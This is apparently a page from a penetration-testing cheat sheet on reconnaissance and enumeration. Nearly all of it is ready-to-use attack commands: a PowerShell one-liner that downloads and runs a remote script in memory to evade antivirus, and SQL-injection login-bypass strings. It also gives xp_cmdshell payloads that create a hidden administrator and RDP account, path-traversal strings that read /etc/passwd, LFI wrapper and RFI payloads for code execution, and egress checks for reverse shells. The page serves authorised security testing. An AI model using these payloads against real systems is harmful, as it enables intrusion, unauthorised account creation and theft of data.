Reconnaissance & enumeration

Enum, enum, enom, enomm, nom nomm!

Bash log

Log all commands and their output:

script target.log

Port scanning

Nmap

nmap -A -sS -Pn -n x.x.x.x

Scan all UDP port without a retry

nmap -sU -p- --max-retries 0 --min-rate 500 x.x.x.x

Nc

nc -nvv -w 1 -z x.x.x.x 1-100

This nc command can be very useful to check egress filtering -> see below

PowerShell (in memory -> AV evasion)

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts x.x.x.x"

Host enum

nikto -h x.x.x.x

enum4linux x.x.x.x

Is the target 32 or 64 bit? https://github.com/SecureAuthCorp/impacket/blob/master/examples/getArch.py

python getArch.py -target x.x.x.x

DNS zone transfer

dig axfr domain.com @nameserver

Web fuzzing

Gobuster

gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20

gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt -t 20

gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20 -x .txt,.php

Wfuzz

wfuzz -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 400,404,500 http://x.x.x.x/FUZZ

wfuzz -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt --hc 400,404,500 http://x.x.x.x/FUZZ

Samba (SMB)

Do not underestimate this one ;)

smbclient -L x.x.x.x

nmap --script=smb-check-vulns.nse x.x.x.x

smbmount //x.x.x.x/share /mnt –o username=hodor,workgroup=hodor

mount -t cifs //x.x.x.x/share /mnt

mount -t cifs -o username=hodor,password=hodor //x.x.x.x/share /mnt

smbclient \\\\x.x.x.x\\share

Anonymous bind using rpcclient:

rpcclient -U "" x.x.x.x

SNMP

Scan using the default community string:

snmpwalk -c public -v1 x.x.x.x

Discover valid usernames by brute force querying possible usernames against a Kerberos service (source: https://nmap.org/nsedoc/scripts/krb5-enum-users.html)

nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local',userdb=/usr/share/wordlists/SecLists/Usernames/top_shortlist.txt x.x.x.x

CMS

CMSmap

cmsmap.py https://x.x.x.x

WPscan

wpscan --url https://x.x.x.x

Bruteforce login:

wpscan --url http://x.x.x.x --wordlist /usr/share/wordlists/SecLists/Passwords/best1050.txt --username admin --threads 10

SQL injection

Test for authentication bypass

1' or '1'='1
1' or '1'='1'
1' or '1'='1'--
' or 1=1 --
a' or 1=1 --
" or 1=1 --
a" or 1=1 --
' or 1=1 #
" or 1=1 #
or 1=1 --
' or 'x'='x
" or "x"="x
') or ('x'='x
") or ("x"="x

Use time delays to find injectable parameter

';WAITFOR DELAY '0:0:5'--

SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/

+BENCHMARK(40000000,SHA1(1337))+
'%2Bbenchmark(3200,SHA1(1))%2B'

If the above works try to enable xp_cmdshell (source: http://pentestmonkey.net/blog/resurecting-xp_cmdshell)

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

xp_cmdshell - test ping

';exec master..xp_cmdshell 'ping -n 3 x.x.x.x'; --

xp_cmdshell - add admin user

';exec master..xp_cmdshell 'net user hodor Qwerty123! /ADD && net localgroup administrators hodor /ADD'; --

xp_cmdshell - add admin user and to RDP group

';exec master..xp_cmdshell 'net user hodor Qwerty123! /ADD && net localgroup administrators hodor /ADD && net localgroup "Remote Desktop Users" hodor /ADD'; --

Local File Inclusion (LFI)

Basic checks

Linux

../../../../../../../../../../etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
../../../../../../../../../../etc/passwd%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500

Windows

../../../../../../../../../../boot.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
../../../../../../../../../../boot.ini%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500

../../../../../../../../../../windows/system32/drivers/etc/hosts
../../../../../../../../../../windows/system32/drivers/etc/hosts%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts%2500

Wordlists: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI

LFI Wrappers

expect://

http://x.x.x.x/blah?parameter=expect://whoami

data://

http://x.x.x.x/blah?parameter=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==
# the base64 encoded payload is: <? phpinfo(); ?>

input://

http://x.x.x.x/blah?parameter=php://input
# POST data (using Hackbar)
<? phpinfo(); ?>

LFI to RCE

Just check: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20inclusion#wrapper-data

Remote File Inclusion (RFI)

Example request (where "x.x.x.x" is your attacker's IP):

GET /supersecret/admin.php?path=http://x.x.x.x/phpinfo.php%00

Check for egress filtering

In other words: find an outgoing port for a reverse shell. First start TCPdump at your own box

tcpdump -i eth0

Run at target (where x.x.x.x is your attacking box)

nc -nvv -w 1 -z x.x.x.x 1-100

Files and file systems

Unmounted file systems

cat /etc/fstab

World writeable directories

find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root

World writeable files

find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null

Writeable config files

find /etc/ -writable -type f 2>/dev/null

PreviousIntroduction NextGaining access

Last updated 5 years ago

Was this helpful?